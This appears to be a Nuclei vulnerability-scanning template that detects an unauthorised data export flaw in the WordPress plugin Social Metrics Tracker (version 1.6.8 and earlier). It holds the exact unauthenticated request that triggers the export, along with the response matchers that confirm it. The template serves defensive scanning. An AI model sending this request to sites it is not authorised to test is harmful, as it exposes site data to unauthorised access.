id: wordpress-social-metrics-tracker

info:
  name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
  author: randomrobbie
  severity: medium
  tags: wordpress,wp-plugin

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "Main URL to Post"
        part: body